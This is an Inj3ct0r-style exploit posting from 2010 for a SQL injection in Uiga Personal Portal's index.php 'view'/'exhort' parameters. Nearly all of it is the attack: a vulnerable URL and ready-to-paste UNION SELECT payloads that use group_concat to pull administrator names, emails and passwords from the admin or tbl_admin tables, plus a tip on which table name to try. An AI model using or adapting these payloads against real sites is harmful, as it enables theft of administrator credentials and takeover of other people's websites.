Uiga Personal Portal index.php (view) SQL Injection
Posted on 26 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Uiga Personal Portal index.php (view) SQL Injection</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================= Uiga Personal Portal index.php (view) SQL Injection Vulnerability ================================================================= # Exploit Title: Uiga Personal Portal index.php (view) SQL Injection Vulnerability # Date: 27-4-2010 # Author: 41.w4r10r # Software Link : http://www.scriptdevelopers.net/download/uigapersonalportal.zip # Version: Web Application # Tested on: Apcahe/Unix # CVE : [if exists] # Dork : # Code : Exploited Link : http://[site]/uigaportal/index.php?view=ar_det&exhort=-36' Examples : http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr oup_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin-- http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema il,0x3a,admin_password),8,9,10,11+from+tbl_admin-- Important: Sometimes the table name is administrators and sometimes its admin # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
